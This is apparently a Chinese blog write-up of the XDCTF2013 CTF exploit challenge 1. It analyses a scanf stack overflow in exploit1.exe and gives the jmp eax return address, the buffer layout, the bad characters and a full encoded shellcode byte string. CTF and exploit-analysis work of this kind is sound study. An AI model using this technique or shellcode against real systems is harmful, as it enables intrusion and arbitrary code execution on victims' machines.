XDCTF2013线上赛exploit关(一)

最新推荐文章于 2019-06-30 19:06:04 发布
最新推荐文章于 2019-06-30 19:06:04 发布
阅读量889 收藏
点赞数
分类专栏: Exploit 文章标签: exploit XDCTF2013
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p0x1307/article/details/12992403
版权

IDA反汇编exploit1.exe,在sub_40FA70里可以看到申请了一个0x10000字节的空间


var_10000= byte ptr -10000h

然后将其作为参数传入了scanf()函数

.text:0040FA9F                 lea     eax, [ebp+var_10000]
.text:0040FAA5                 push    eax
.text:0040FAA6                 push    offset Format   ; "%s"
.text:0040FAAB                 call    _scanf

由于scanf()函数并不进行边界检查,造成栈溢出。

覆盖返回地址时,数据布局为
0x10000
ebp
RetAddr

观察此时寄存器内容,发现只有eax和esp指向栈。但是如果利用esp跳转的话,shellcode需要布置在返回地址下面,覆盖了下面的栈帧,导致程序崩溃,于是只能利用jmp eax进行跳转。

此时虽然eax并不指向buf,但是其所指向地址中的内容是从buf中复制而来,因此只要做一个短跳转就可以了。

利用OD的插件OllyFindAddr,找到一个jmp eax的地址为7c8f6571,用这个地址覆盖返回地址。在buf中合适的位置上填充shellcode,然后再buf头部放置短跳转地址。最终的buf布局为

                                    -----
短跳转            <-- 复制到eax指向位置,跳到shellcode        
junk                             ↑
shellcode        共计0x10000字节
junk                             ↓
                                    -----
ebp

RetAddr            <-- 填充为7c8f6571,jmp eax的地址


需要注意的是,scanf会将一些字符当做截断,因此shellcode中不能存在以下字符:

0x09 0x0a 0x0b 0x0c 0x0d 0x1a 0x20 0x00

可能不全,我只测了小于0x20的一部分。

另外就是这个缓冲区很大,0x10000字节。输入字符的时候可以将布置好的字符串存在一个txt中,在运行漏洞程序的时候使用

exploit1.exe < 1.txt

就可以将txt中的字符串当做输入传递给程序了。

shellcode

"\xba\x52\x5b\x54\xd8\xdb\xcf\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x41\x31\x56\x12\x03\x56\x12\x83\x94\x5f\xb6\x2d\xc1\x8b\xad"
"\x17\x85\x6f\x26\x96\xb7\xc2\xb1\xe8\xfe\x47\xb5\x7a\x30\x03"
"\xbf\x70\xbb\x65\x5c\x02\xfd\x81\xd7\x6a\x21\x19\xd1\xaa\x6e"
"\x05\x6b\x38\x29\x34\x42\x41\x28\x56\xef\xd2\x8e\xb3\x64\x6f"
"\xf2\x30\x2e\x58\x72\x46\x25\x13\xc8\x50\x32\x7e\xec\x61\xaf"
"\x9c\xd8\x28\xa4\x57\xab\xaa\x54\xa6\x54\x9d\x68\x35\x06\x5a"
"\xa8\xb2\x51\xa2\xe6\x36\x5c\xe3\x12\xbc\x65\x97\xc0\x15\xec"
"\x86\x82\x3c\x2a\x48\x7e\xa6\xb9\x46\xcb\xac\xe7\x4a\xca\x59"
"\x9c\x77\x47\x9c\x4a\xfe\x13\xbb\x96\x60\x5f\x71\xae\x4b\x8b"
"\xff\x4b\x02\xf1\x68\x1d\x5b\xf8\x84\x73\x8c\x9b\xaa\x8c\xb3"
"\x2d\x11\x76\xf7\x50\x42\x94\x74\x2a\x6e\x7c\x29\xdc\x01\x83"
"\x32\xe3\x97\x3e\xc5\x74\xc4\xac\xf5\xc5\x7c\x1f\xc4\xeb\x18"
"\x37\x5d\x87\x85\xb5\x15\x3b\x62\x33\xaf\x22\x3c\xbc\xfa\xae"
"\x48\x80\x55\x14\xe2\xa6\x1b\xd6\x74\xba\x87\x74\x93\xa3\x38"
"\x87\x9c\x4b\xa8\x11\x17\xd3\x5e\x87\xaf\x93\xf2\x76\x8b\xdb"
"\x57\x5d\x2c\x52\x84\xf5\x6a\x44\x6b\x26\xe3\xe1\x18\x55\xd2"
"\x81\x8d\xec\x77\x32\x03\xc6\xf0\xf8\x47\xd0\x89\xe1\xb9\x32"
"\xe3\xe0\xea\xe3\xa6\x1d\xdc\x35\x87\xb1\x22\x60\x0f";


p0x1307
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
强网杯2019(高明的黑客&强网先锋上单)
kid的博客
05-30 5596
强网杯2019(高明的黑客&强网先锋上单)   前言 这里主要是对强网杯web中高明的黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明的黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
强网杯-JustRe
40KO的博客
05-28 1724
Windows32位程序,无壳,编译器版本还算高。 主函数除了CFG有点诡异外,流程十分简单。 进入第一个check函数,可以看到大量SSE指令,前面一些基本的判断很不好看,直接调试看结果 .text:00401682 060 movd xmm0, eax .text:00401686 060 pshufd xmm5,...
CTF加密解密 常见的加密方式
zzqsmile的博客
05-14 3387
http://drops.wooyun.org/tips/10002
2017第二届广东省强网杯线上赛 Nonstandard
you_need_me的博客
04-21 1276
先拉入ida分析一下我们只要让sub_401480返回值为1就可以了他把我们输入的flag进行操作与byte_402120比较byte_402120的值,这里要把前面的6eh加上也就是‘n’,得到nAdtxA66nbbdxA71tUAE2AOlnnbtrAp1nQzGtAQGtrjC7===接着我们再看一下函数sub_401070发现有点长。。。 我截取了一部分发现红框里的代码每次以5个bit为一...
2017第二届广东省强网杯线上赛——WEB-phone number
Ifish的博客
04-04 2669
打开链接,进入登录界面http://106.75.72.168:3333/login.php看源码抓包查看源码发现最大长度为11,没有设置电话的前几位数字注册一个新用户burp suite抓包点击check源码联想到题目想到应该是在电话这里作为突破口应该是注入,因为必须是数字,所以最先想到二进制,但是发现行不通所以尝试16进制,发现可以成功,所以登录,按照注册的名字登录,发现电话号码是修改的sql...
BungeeExploit_Exploit_minecraft源码_
10-02
BungeeExploit就是一种专门针对BungeeCord的exploit,利用其代码中的弱点,可能导致服务器被攻击者控制,或者对玩家数据的安全构成威胁。 BungeeExploit的工作原理通常是通过发送精心构造的网络数据包,诱使...
iis7.rar_Exploit
09-24
【标题】"iis7.rar_Exploit"指的是针对IIS7(Internet Information Services 7)的一个漏洞利用工具。IIS是微软公司推出的Web服务器软件,广泛用于企业级的网站托管。IIS7是该系列的第七个主要版本,发布于2007年,...
winoday.zip_Exploit_zip
09-23
标题 "winoday.zip_Exploit_zip" 暗示了我们正在处理一个与Windows系统相的安全漏洞利用,特别是与ZIP文件格式有。描述中的 "NtVdmControl exploit" 提到了一个具体的攻击手段,它是利用Windows系统中的...
AttackWithDefense比赛中的exploit快速集成小脚本。.zip
最新发布
09-30
"AWD-Batcher-main"可能是一个主要的脚本文件,用于自动化exploit的构建和执行流程。这个脚本可能包含了以下键知识点: 1. **Exploit开发基础**:在exploit开发中,首先要理解目标程序的漏洞原理,这通常涉及到...
2017第二届广东省强网杯线上赛——WEB-broken
Ifish的博客
04-06 1438
首先看到这个题目,就想到得到的这个文件是有问题的,一般内容上不会丢失,应该缺少的是格式上的一些头啊什么的点击链接点击filejsfuck ,按照常见的套路复制粘贴到控制台执行根据提示,查看代码,因为是[]没有闭合,所以想到是在头部或者尾部的地方有问题,看到开头出现两个[[,所以先尝试将文件的[[改为[][因为flag不在这里,所以想到不是在代码执行结果中,就应该在代码中了,所以删除最后代表func...
BUUCTF-强网杯-随便注
wuerror的博客
06-30 6512
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html 1‘ //首先尝试的加引号,报错了 1’ # //正常 1‘ order by 1 # //用order by 测试得到列数为2 1' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
2015广东强网杯web专题
热门推荐
4ct10n
09-16 3万+
2015广州强网杯1.万国码 Unicode编码转换#-*- coding : gbk -*- s=u'\u0066\u006c\u0061\u0067\u007b\u0032\u0035\u0033\u0039\u0061\u0034\u0036\u0036\u002d\u0030\u0062\u0064\u0031\u002d\u0034\u0062\u0061\u0036\u002d\u0
Windbg的Symbol路径配置
p0x1307的专栏
08-29 3002
用OD调试漏洞总是跑飞,开始学着用Windbg。被Symbol的路径问题折腾了半天,在网上也没找着合适的方法,不过还好最后折腾出来了。 首先是下载合适自己系统版本的Symbol安装文件,注意,一定要下适合自己系统的,XP SP2下SP3版本的就等着哭吧。 下载链接:http://msdn.microsoft.com/en-us/windows/hardware/gg463028.aspx 下
linux exec /bin/sh shellcode x86 and x86_64
p0x1307的专栏
07-17 1890
linux/x86/x64 shellcode:exec /bin/sh
Ubuntu下安装Metasploit
p0x1307的专栏
10-04 1751
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。 首先在Metesploit官网下载最新的安装包。下载地址:http://www.metasploit.com/download/ 下载之后记得比对校检码,如果校检码不符合,说明安装包在下载过程中损坏,需要重新下载。损坏的安
Adobe PDF LibTiff Integer Overflow CVE-2010-0188分析
p0x1307的专栏
08-30 1721
一,TIFF图像格式介绍 TIFF文件分为文件头IFH和IFD两部分。 IFH结构见下图: 共有8字节。其中 0-1 规定为“II”或“MM”,Intel/Mortorola类型的字节序列 2-3 TIFF版本号,为向下兼容,值为42 4-7 第一个IFD的偏移量 IFD结构见下图 IFD由连续存储的DE组成。 0-1 IFD中DE个数 2-13 第一个DE
XDCTF2013线上赛exploit(三)
p0x1307的专栏
10-07 1230
国际惯例,下载程序后先拖入IDA分析,看了半天也没看出个所以然。 于是直接发送超长数据,看程序会不会崩。 FTP服务器在接收完USER和PASS之后,会发送Welcome信息。直觉告诉我,这儿应该会崩,于是写个socket程序,发送长字符串,程序果然崩了。 然后用windbg载入,用kn命令看一下调用堆栈。尝试了几次后,找到了键函数sub_4013D0。 这个函数先是创建socket,然
exploit编写教程:基于栈的溢出分析与实践
"Exploit 编写系列教程第一篇,主要介绍了基于栈的溢出漏洞的利用方法,通过分析一个具体的漏洞案例——存在于EasyRMtoMP3ConversionUtility软件中的漏洞,来阐述Exploit开发的基本流程和技术。教程强调了理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值